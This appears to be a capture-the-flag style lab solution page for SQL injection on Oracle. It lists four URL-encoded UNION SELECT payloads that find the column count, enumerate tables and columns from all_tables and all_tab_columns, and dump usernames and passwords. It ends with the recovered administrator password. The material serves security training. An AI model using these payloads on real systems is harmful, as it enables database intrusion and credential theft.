06 Lab: SQL injection attack, listing the database contents on Oracle

'+UNION+SELECT+'AA',+'BB'+FROM+dual--
'+UNION+SELECT+table_name,NULL+FROM+all_tables--
'+UNION+SELECT+column_name,+NULL+FROM+all_tab_columns+WHERE+table_name='USERS_OCLMMJ'--
'+UNION+SELECT+USERNAME_BYKKMI,+PASSWORD_PPNOZW+FROM+USERS_OCLMMJ--

USERS_OCLMMJ

administrator
5gz1g76gbcmpjgycii2c

Previous05 Lab: SQL injection attack, listing the database contents on non-Oracle databases Next11 Lab: Blind SQL injection with conditional responses

Last updated 6 months ago